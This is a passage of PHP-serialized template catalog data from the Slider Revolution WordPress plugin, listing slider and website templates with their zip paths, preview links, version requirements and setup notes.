Magazine\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:216;a:25:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:18:\"Clear View Clients\";s:5:\"alias\";s:18:\"clear-view-clients\";s:3:\"zip\";s:28:\"packs/clear-view-clients.zip\";s:3:\"uid\";s:32:\"b95616a94832e22bdfac5ce60232be1b\";s:3:\"img\";s:29:\"clear-view-clients/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:217;a:25:{s:2:\"id\";s:3:\"226\";s:5:\"title\";s:18:\"Clear View Contact\";s:5:\"alias\";s:18:\"clear-view-contact\";s:3:\"zip\";s:28:\"packs/clear-view-contact.zip\";s:3:\"uid\";s:32:\"0e0cc1d8f6f6500e5f8a2b091fa3b4cb\";s:3:\"img\";s:29:\"clear-view-contact/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:218;a:25:{s:2:\"id\";s:3:\"227\";s:5:\"title\";s:20:\"Clear View Post Page\";s:5:\"alias\";s:28:\"clear-view-post-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"clear-view-post-page-package\";s:3:\"img\";s:42:\"packages/clear_view_post_page_overview.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:219;a:25:{s:2:\"id\";s:3:\"228\";s:5:\"title\";s:22:\"Clear View Single Menu\";s:5:\"alias\";s:22:\"clear-view-single-menu\";s:3:\"zip\";s:32:\"packs/clear-view-single-menu.zip\";s:3:\"uid\";s:32:\"1e80f81982f8a4ea763482d4fa99d321\";s:3:\"img\";s:33:\"clear-view-single-menu/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:220;a:25:{s:2:\"id\";s:3:\"229\";s:5:\"title\";s:24:\"Clear View Single Header\";s:5:\"alias\";s:24:\"clear-view-single-header\";s:3:\"zip\";s:34:\"packs/clear-view-single-header.zip\";s:3:\"uid\";s:32:\"c8d717627be6cd5e70922ab609694dbf\";s:3:\"img\";s:35:\"clear-view-single-header/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:221;a:25:{s:2:\"id\";s:3:\"230\";s:5:\"title\";s:23:\"Clear View Single Media\";s:5:\"alias\";s:23:\"clear-view-single-media\";s:3:\"zip\";s:33:\"packs/clear-view-single-media.zip\";s:3:\"uid\";s:32:\"c480368ded2a64f0cdd44f1674213814\";s:3:\"img\";s:34:\"clear-view-single-media/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:222;a:25:{s:2:\"id\";s:3:\"231\";s:5:\"title\";s:22:\"Clear View Single More\";s:5:\"alias\";s:22:\"clear-view-single-more\";s:3:\"zip\";s:32:\"packs/clear-view-single-more.zip\";s:3:\"uid\";s:32:\"9c693190df26218366d1f77e10cf550a\";s:3:\"img\";s:33:\"clear-view-single-more/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:223;a:25:{s:2:\"id\";s:3:\"232\";s:5:\"title\";s:25:\"Clear View Single Contact\";s:5:\"alias\";s:25:\"clear-view-single-contact\";s:3:\"zip\";s:35:\"packs/clear-view-single-contact.zip\";s:3:\"uid\";s:32:\"73c0a889f2b654a87b5aba1ff76fbc5c\";s:3:\"img\";s:36:\"clear-view-single-contact/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:224;a:22:{s:2:\"id\";s:3:\"233\";s:5:\"title\";s:18:\"Clean Landing Page\";s:5:\"alias\";s:16:\"cleanlandingpage\";s:3:\"zip\";s:20:\"cleanlandingpage.zip\";s:3:\"uid\";s:32:\"727a3680d312f22c6a5998ebdb9afe52\";s:3:\"img\";s:27:\"cleanlandingpage/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/clean-landing-page-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:203:\"<span class=\"ttm_content\">The Clean Landing Page is a fullscreen Intro Module that is a striking introduction to any minimal website, with no unnecessary elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:225;a:22:{s:2:\"id\";s:3:\"234\";s:5:\"title\";s:9:\"Clear Cut\";s:5:\"alias\";s:8:\"clearcut\";s:3:\"zip\";s:12:\"clearcut.zip\";s:3:\"uid\";s:32:\"07f43c00e9b4d3057a03cdb3385ad2b7\";s:3:\"img\";s:19:\"clearcut/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/clear-cut-portfolio-website-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:240:\"<span class=\"ttm_content\">The Clear Cut Template is an All-In-One Portfolio Website solution that works best for smaller portfolios. Highlight your best work in a striking and mobile friendly fashion!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:226;a:25:{s:2:\"id\";s:3:\"235\";s:5:\"title\";s:22:\"Wonderstruck One-Pager\";s:5:\"alias\";s:30:\"wonderstruck-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:30:\"wonderstruck-one-pager-package\";s:3:\"img\";s:44:\"packages/wonderstruck-one-pager-overview.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:227;a:25:{s:2:\"id\";s:3:\"236\";s:5:\"title\";s:17:\"Wonderstruck Menu\";s:5:\"alias\";s:17:\"wonderstruck_menu\";s:3:\"zip\";s:27:\"packs/wonderstruck_menu.zip\";s:3:\"uid\";s:32:\"0a976e9aaae59c4f795b38f59f5a08d8\";s:3:\"img\";s:28:\"wonderstruck_menu/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:228;a:25:{s:2:\"id\";s:3:\"237\";s:5:\"title\";s:19:\"Wonderstruck Header\";s:5:\"alias\";s:19:\"wonderstruck_header\";s:3:\"zip\";s:29:\"packs/wonderstruck_header.zip\";s:3:\"uid\";s:32:\"e1379f77a902960a0ce12d44d85a9e0a\";s:3:\"img\";s:30:\"wonderstruck_header/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:229;a:25:{s:2:\"id\";s:3:\"238\";s:5:\"title\";s:18:\"Wonderstruck About\";s:5:\"alias\";s:18:\"wonderstruck_about\";s:3:\"zip\";s:28:\"packs/wonderstruck_about.zip\";s:3:\"uid\";s:32:\"d207fb140fd328acc3038300ea52082a\";s:3:\"img\";s:29:\"wonderstruck_about/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:230;a:25:{s:2:\"id\";s:3:\"239\";s:5:\"title\";s:18:\"Wonderstruck Works\";s:5:\"alias\";s:18:\"wonderstruck-works\";s:3:\"zip\";s:28:\"packs/wonderstruck-works.zip\";s:3:\"uid\";s:32:\"4476935097e27d92454b0011b7700c1d\";s:3:\"img\";s:29:\"wonderstruck-works/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:231;a:25:{s:2:\"id\";s:3:\"240\";s:5:\"title\";s:20:\"Wonderstruck Contact\";s:5:\"alias\";s:20:\"wonderstruck-contact\";s:3:\"zip\";s:30:\"packs/wonderstruck-contact.zip\";s:3:\"uid\";s:32:\"9e4911521f77bce2b8efa40f4c2adc22\";s:3:\"img\";s:31:\"wonderstruck-contact/slide1.jpg\";s:7:\"preview\";s:77:\"https://revolution.themepunch.com/wonderstruck-one-page-website-for-wordpress\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">The Wonderstruck One-Pager Template is a clean, colorful way to showcase your portfolio online. Just install, change the content and you have a mobile ready online experience!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Wonderstruck One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"13\";s:9:\"installed\";b:0;}i:232;a:22:{s:2:\"id\";s:3:\"241\";s:5:\"title\";s:12:\"Bubble Morph\";s:5:\"alias\";s:11:\"bubblemorph\";s:3:\"zip\";s:15:\"bubblemorph.zip\";s:3:\"uid\";s:32:\"1102d6f5460ab82cb612cbe9f1d9514b\";s:3:\"img\";s:22:\"bubblemorph/slide1.jpg\";s:7:\"preview\";s:75:\"https://revolution.themepunch.com/bubble-morph-effect-add-on-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.7\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:188:\"<span class=\"ttm_content\">The Bubble Morph Add-On allows you to create interesting Lava-Lamp style effects on any of your Slider Revolution content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:233;a:22:{s:2:\"id\";s:3:\"242\";s:5:\"title\";s:16:\"Distortion 